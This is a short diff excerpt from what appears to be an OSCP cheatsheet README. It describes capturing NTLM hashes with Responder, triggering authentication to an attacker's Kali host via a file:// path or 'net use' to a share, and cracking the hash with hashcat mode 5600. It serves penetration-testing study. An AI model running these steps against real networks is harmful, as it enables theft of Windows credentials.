Desm0ndChan/OSCP-cheatsheet/README.md

 responder -I tun0
 ```
 To launch the attack remotely, use `file://IP/file` instead of http/smb etc

 To launch the attack locally (in a windows host), use `net use Y: \\KALI_IP\share`

-crack the captured hash with hashcat 5600
+crack the captured hash with hashcat mode 5600

 ## 3. File Transfer
 ### Linux target